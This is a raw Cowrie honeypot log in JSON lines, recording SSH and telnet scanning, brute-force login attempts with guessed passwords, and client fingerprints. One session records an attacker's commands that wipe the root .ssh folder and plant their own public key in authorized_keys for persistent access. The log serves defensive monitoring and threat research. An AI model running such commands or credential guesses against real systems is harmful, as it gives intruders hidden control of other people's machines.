{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:24:25.809481Z","src_ip":"27.112.78.170","session":"2fcb04ee89d8"}
{"eventid":"cowrie.login.failed","username":"xt","password":"xt","message":"login attempt [xt/xt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:24:26.905492Z","src_ip":"27.112.78.170","session":"2fcb04ee89d8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:24:28.171777Z","src_ip":"27.112.78.170","session":"2fcb04ee89d8"}
{"eventid":"cowrie.session.closed","duration":12.445109605789185,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:24:32.866399Z","src_ip":"212.227.235.229","session":"ca1a1e91a503"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62361,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0b4833bea93","protocol":"telnet","message":"New connection: 212.227.235.229:62361 (1.2.3.4:23) [session: d0b4833bea93]","sensor":"my-vps","timestamp":"2025-08-26T01:24:33.156270Z"}
{"eventid":"cowrie.session.closed","duration":12.695399045944214,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:24:45.851598Z","src_ip":"212.227.235.229","session":"d0b4833bea93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59521,"dst_ip":"1.2.3.4","dst_port":23,"session":"d713ea6bd3d7","protocol":"telnet","message":"New connection: 212.227.235.229:59521 (1.2.3.4:23) [session: d713ea6bd3d7]","sensor":"my-vps","timestamp":"2025-08-26T01:24:46.103635Z"}
{"eventid":"cowrie.session.closed","duration":12.748769521713257,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:24:58.852326Z","src_ip":"212.227.235.229","session":"d713ea6bd3d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54864,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6d0f222db51","protocol":"telnet","message":"New connection: 212.227.235.229:54864 (1.2.3.4:23) [session: b6d0f222db51]","sensor":"my-vps","timestamp":"2025-08-26T01:24:59.169004Z"}
{"eventid":"cowrie.session.closed","duration":12.699415445327759,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:25:11.868353Z","src_ip":"212.227.235.229","session":"b6d0f222db51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16453,"dst_ip":"1.2.3.4","dst_port":23,"session":"1bcecdae85e9","protocol":"telnet","message":"New connection: 212.227.235.229:16453 (1.2.3.4:23) [session: 1bcecdae85e9]","sensor":"my-vps","timestamp":"2025-08-26T01:25:12.153130Z"}
{"eventid":"cowrie.session.closed","duration":12.651275634765625,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:25:24.804335Z","src_ip":"212.227.235.229","session":"1bcecdae85e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4628,"dst_ip":"1.2.3.4","dst_port":23,"session":"083bcd0d1586","protocol":"telnet","message":"New connection: 212.227.235.229:4628 (1.2.3.4:23) [session: 083bcd0d1586]","sensor":"my-vps","timestamp":"2025-08-26T01:25:25.121454Z"}
{"eventid":"cowrie.session.closed","duration":12.70019006729126,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:25:37.821575Z","src_ip":"212.227.235.229","session":"083bcd0d1586"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10117,"dst_ip":"1.2.3.4","dst_port":23,"session":"68b055b06a84","protocol":"telnet","message":"New connection: 212.227.235.229:10117 (1.2.3.4:23) [session: 68b055b06a84]","sensor":"my-vps","timestamp":"2025-08-26T01:25:38.104237Z"}
{"eventid":"cowrie.session.closed","duration":12.75007939338684,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:25:50.854232Z","src_ip":"212.227.235.229","session":"68b055b06a84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14777,"dst_ip":"1.2.3.4","dst_port":23,"session":"83944f58987b","protocol":"telnet","message":"New connection: 212.227.235.229:14777 (1.2.3.4:23) [session: 83944f58987b]","sensor":"my-vps","timestamp":"2025-08-26T01:25:51.115526Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":50814,"dst_ip":"1.2.3.4","dst_port":22,"session":"98abbbc1cb0b","protocol":"ssh","message":"New connection: 27.112.78.170:50814 (1.2.3.4:22) [session: 98abbbc1cb0b]","sensor":"my-vps","timestamp":"2025-08-26T01:25:53.534932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:25:53.535941Z","src_ip":"27.112.78.170","session":"98abbbc1cb0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:25:53.797864Z","src_ip":"27.112.78.170","session":"98abbbc1cb0b"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"1","message":"login attempt [ansible/1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:25:54.883667Z","src_ip":"27.112.78.170","session":"98abbbc1cb0b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:25:56.150153Z","src_ip":"27.112.78.170","session":"98abbbc1cb0b"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":47570,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a9981201cce","protocol":"ssh","message":"New connection: 45.88.8.215:47570 (1.2.3.4:22) [session: 9a9981201cce]","sensor":"my-vps","timestamp":"2025-08-26T01:25:58.434258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:25:58.887616Z","src_ip":"45.88.8.215","session":"9a9981201cce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:25:58.888308Z","src_ip":"45.88.8.215","session":"9a9981201cce"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayaram@123","message":"login attempt [root/Jayaram@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:26:01.090623Z","src_ip":"45.88.8.215","session":"9a9981201cce"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:01.519114Z","src_ip":"45.88.8.215","session":"9a9981201cce"}
{"eventid":"cowrie.session.closed","duration":12.799827814102173,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:03.915283Z","src_ip":"212.227.235.229","session":"83944f58987b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8560,"dst_ip":"1.2.3.4","dst_port":23,"session":"80f66ef27b0d","protocol":"telnet","message":"New connection: 212.227.235.229:8560 (1.2.3.4:23) [session: 80f66ef27b0d]","sensor":"my-vps","timestamp":"2025-08-26T01:26:04.158492Z"}
{"eventid":"cowrie.session.closed","duration":12.651701211929321,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:16.810111Z","src_ip":"212.227.235.229","session":"80f66ef27b0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57710,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec2c196c1516","protocol":"telnet","message":"New connection: 212.227.235.229:57710 (1.2.3.4:23) [session: ec2c196c1516]","sensor":"my-vps","timestamp":"2025-08-26T01:26:17.046920Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58818,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff7387054ac4","protocol":"telnet","message":"New connection: 212.227.235.229:58818 (1.2.3.4:23) [session: ff7387054ac4]","sensor":"my-vps","timestamp":"2025-08-26T01:26:18.043847Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:26:18.239103Z","src_ip":"212.227.235.229","session":"ff7387054ac4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:26:18.292356Z","src_ip":"212.227.235.229","session":"ff7387054ac4"}
{"eventid":"cowrie.session.closed","duration":12.800037622451782,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:29.846883Z","src_ip":"212.227.235.229","session":"ec2c196c1516"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7832,"dst_ip":"1.2.3.4","dst_port":23,"session":"7be8c08c1e45","protocol":"telnet","message":"New connection: 212.227.235.229:7832 (1.2.3.4:23) [session: 7be8c08c1e45]","sensor":"my-vps","timestamp":"2025-08-26T01:26:30.161064Z"}
{"eventid":"cowrie.session.closed","duration":12.700419425964355,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:42.861413Z","src_ip":"212.227.235.229","session":"7be8c08c1e45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11952,"dst_ip":"1.2.3.4","dst_port":23,"session":"48602e246489","protocol":"telnet","message":"New connection: 212.227.235.229:11952 (1.2.3.4:23) [session: 48602e246489]","sensor":"my-vps","timestamp":"2025-08-26T01:26:43.239496Z"}
{"eventid":"cowrie.session.closed","duration":12.649508476257324,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:26:55.888915Z","src_ip":"212.227.235.229","session":"48602e246489"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57934,"dst_ip":"1.2.3.4","dst_port":23,"session":"08782f0e8674","protocol":"telnet","message":"New connection: 212.227.235.229:57934 (1.2.3.4:23) [session: 08782f0e8674]","sensor":"my-vps","timestamp":"2025-08-26T01:26:56.255959Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.45.66.135","src_port":50094,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1dffebec117","protocol":"ssh","message":"New connection: 113.45.66.135:50094 (1.2.3.4:22) [session: d1dffebec117]","sensor":"my-vps","timestamp":"2025-08-26T01:26:59.594695Z"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:07.162360Z","src_ip":"113.45.66.135","session":"d1dffebec117"}
{"eventid":"cowrie.session.closed","duration":12.64876389503479,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:08.904655Z","src_ip":"212.227.235.229","session":"08782f0e8674"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26669,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f7a0c42f802","protocol":"telnet","message":"New connection: 212.227.235.229:26669 (1.2.3.4:23) [session: 2f7a0c42f802]","sensor":"my-vps","timestamp":"2025-08-26T01:27:09.113353Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":38672,"dst_ip":"1.2.3.4","dst_port":22,"session":"44f3bc3be531","protocol":"ssh","message":"New connection: 27.112.78.170:38672 (1.2.3.4:22) [session: 44f3bc3be531]","sensor":"my-vps","timestamp":"2025-08-26T01:27:19.048363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:27:19.049157Z","src_ip":"27.112.78.170","session":"44f3bc3be531"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:27:19.318016Z","src_ip":"27.112.78.170","session":"44f3bc3be531"}
{"eventid":"cowrie.login.failed","username":"botuser","password":"1","message":"login attempt [botuser/1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:27:20.429363Z","src_ip":"27.112.78.170","session":"44f3bc3be531"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:21.698995Z","src_ip":"27.112.78.170","session":"44f3bc3be531"}
{"eventid":"cowrie.session.closed","duration":12.749008417129517,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:21.862287Z","src_ip":"212.227.235.229","session":"2f7a0c42f802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22560,"dst_ip":"1.2.3.4","dst_port":23,"session":"e9bac23a0534","protocol":"telnet","message":"New connection: 212.227.235.229:22560 (1.2.3.4:23) [session: e9bac23a0534]","sensor":"my-vps","timestamp":"2025-08-26T01:27:22.151809Z"}
{"eventid":"cowrie.session.closed","duration":12.699383735656738,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:34.851121Z","src_ip":"212.227.235.229","session":"e9bac23a0534"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50095,"dst_ip":"1.2.3.4","dst_port":23,"session":"2cc76ae75813","protocol":"telnet","message":"New connection: 212.227.235.229:50095 (1.2.3.4:23) [session: 2cc76ae75813]","sensor":"my-vps","timestamp":"2025-08-26T01:27:35.107254Z"}
{"eventid":"cowrie.session.connect","src_ip":"117.216.211.19","src_port":46588,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd4f13f2dc3c","protocol":"ssh","message":"New connection: 117.216.211.19:46588 (1.2.3.4:22) [session: dd4f13f2dc3c]","sensor":"my-vps","timestamp":"2025-08-26T01:27:36.914169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:27:36.915020Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:27:37.085744Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567c","message":"login attempt [root/1234567c] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:27:37.808251Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:27:38.166576Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.167291Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.168513Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.340878Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:27:38.787327Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.788004Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.960724Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:38.961590Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.session.connect","src_ip":"117.216.211.19","src_port":47052,"dst_ip":"1.2.3.4","dst_port":22,"session":"41e7bbd2bb86","protocol":"ssh","message":"New connection: 117.216.211.19:47052 (1.2.3.4:22) [session: 41e7bbd2bb86]","sensor":"my-vps","timestamp":"2025-08-26T01:27:39.124870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:27:39.125757Z","src_ip":"117.216.211.19","session":"41e7bbd2bb86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:27:39.290699Z","src_ip":"117.216.211.19","session":"41e7bbd2bb86"}
